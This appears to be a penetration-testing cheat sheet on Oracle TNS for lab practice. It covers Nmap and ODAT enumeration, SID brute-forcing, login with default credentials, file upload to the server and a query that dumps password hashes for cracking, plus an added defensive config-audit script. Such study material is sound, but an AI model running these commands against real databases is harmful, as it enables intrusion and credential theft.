Oracle TNS
Table of Contents
- Introduction to Oracle TNS
- Enumeration Techniques
- Advanced Techniques
- Exploitation Scenarios
- Combining Tools
- Glossary
Introduction to Oracle TNS
Overview
Oracle Transparent Network Substrate (TNS) is a protocol that facilitates communication between Oracle databases and client applications over networks.
Key Features:
- Purpose: Enables database connection management, name resolution, and security features like encryption and authentication.
- Uses: Widely deployed in industries like healthcare, finance, and retail.
Default Configuration
Default Values | Description |
---|---|
Port: 1521 | Default TNS listener port. |
Listener File: listener.ora | Defines the listener behavior. |
Service File: tnsnames.ora | Resolves database service names. |
Example Listener File (listener.ora):
LISTENER =
(DESCRIPTION_LIST =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = orcl.htb)(PORT = 1521))
)
)
Example Service File (tnsnames.ora):
ORCL =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = orcl)
)
)
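Added example (not part of the original page or of any Oracle tooling): a small Python parser for the nested-parenthesis format used by listener.ora and tnsnames.ora above, which inventories every ADDRESS and reports those on the default port 1521 or not using PROTOCOL = TCPS, Oracle Net's TLS transport. The function names and the two checks are illustrative assumptions; quoted values and values containing spaces are not handled.

```python
import re

# Constructed sample: the tnsnames.ora entry shown above, condensed.
SAMPLE = """ORCL = (DESCRIPTION =
  (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521)))
  (CONNECT_DATA = (SERVICE_NAME = orcl)))"""

def parse_tns(text):
    """Return {alias: tree}; a tree is a list of (KEY, str-or-subtree) pairs."""
    tokens = re.findall(r"[()=]|[^()=\s]+", re.sub(r"#.*", "", text)) + [None] * 4
    pos = 0                                   # None padding: truncated input cannot overrun
    def node():
        nonlocal pos
        items = []
        while tokens[pos] == "(":
            key = str(tokens[pos + 1]).upper()
            pos += 3                          # consume "(", KEY, "="
            if tokens[pos] == "(":
                value = node()
            else:
                value, pos = tokens[pos], pos + 1
            if tokens[pos] != ")":
                raise ValueError(f"unbalanced parentheses near {key}")
            pos += 1
            items.append((key, value))
        return items
    entries = {}
    while tokens[pos] is not None:
        alias, pos = tokens[pos], pos + 2     # consume ALIAS and "="
        entries[alias] = node()
    return entries

def addresses(tree):
    """Yield every ADDRESS node as a dict, however deeply it is nested."""
    for key, value in tree:
        if isinstance(value, list):
            yield from [dict(value)] if key == "ADDRESS" else addresses(value)

def audit(text):
    """List endpoints on the default port 1521 or not using PROTOCOL = TCPS."""
    findings = []
    for alias, tree in parse_tns(text).items():
        for a in addresses(tree):
            where = f"{alias} {a.get('HOST')}:{a.get('PORT')}"
            if a.get("PORT") == "1521":
                findings.append(f"{where}: default listener port")
            if str(a.get("PROTOCOL")).upper() != "TCPS":
                findings.append(f"{where}: PROTOCOL is not TCPS")
    return findings
```

Calling `audit(SAMPLE)` returns two findings for the ORCL entry. Native network encryption configured in sqlnet.ora is separate from the transport protocol and is not visible in these two files.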
Enumeration Techniques
Service Discovery with Nmap
Scan for TNS services and detect versions.
Command:
nmap -p1521 -sV TARGET_IP
Example Output:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0
SID Enumeration
Discover valid SIDs using Nmap or ODAT.
Using Nmap:
nmap -p1521 --script oracle-sid-brute TARGET_IP
Example Output:
| oracle-sid-brute:
|_ XE
Advanced Techniques
Using ODAT for Oracle Enumeration
ODAT (Oracle Database Attacking Tool) is an open-source Python-based tool for Oracle database enumeration.
Install:
git clone https://github.com/quentinhardy/odat.git
cd odat
pip3 install -r requirements.txt
Run All Modules:
python3 odat.py all -s TARGET_IP
SQLplus Interaction
After obtaining credentials, use sqlplus to interact with the database.
Login:
sqlplus scott/tiger@TARGET_IP/XE
Common Commands:
- List all tables:
SELECT table_name FROM all_tables;
- Show user privileges:
SELECT * FROM user_role_privs;
Exploitation Scenarios
File Upload with ODAT
Use ODAT to upload files to the Oracle server.
Example:
python3 odat.py utlfile -s TARGET_IP -d XE -U scott -P tiger --putFile /local/path/to/file /remote/path/on/server
Validate Upload:
curl http://TARGET_IP/<uploaded_file>
Extracting Password Hashes
Dump user hashes for offline cracking.
SQL Command:
SELECT name, password FROM sys.user$;
Example Output:
NAME PASSWORD
SYS FBA343E7D6C8BC9D
OUTLN 4A3BA55E08595C81
Combining Tools
Nmap and ODAT
Discovery with Nmap:
nmap -p1521 -sV TARGET_IP
Enumeration with ODAT:
python3 odat.py sidguesser -s TARGET_IP
Automating Oracle Enumeration
Automate common tasks with scripts.
Bash Script Example:
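#!/bin/bash
# Usage: ./script.sh TARGET_IP (run from the odat directory)
target="${1:?usage: $0 TARGET_IP}"
nmap -p1521 --script oracle-sid-brute "$target"
python3 odat.py all -s "$target"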
Glossary
Term | Definition |
---|---|
TNS | Oracle Transparent Network Substrate protocol. |
SID | System Identifier for Oracle database instances. |
ODAT | Oracle Database Attacking Tool. |
Listener | Process that manages database connections. |
SQLplus | Command-line interface for Oracle database management. |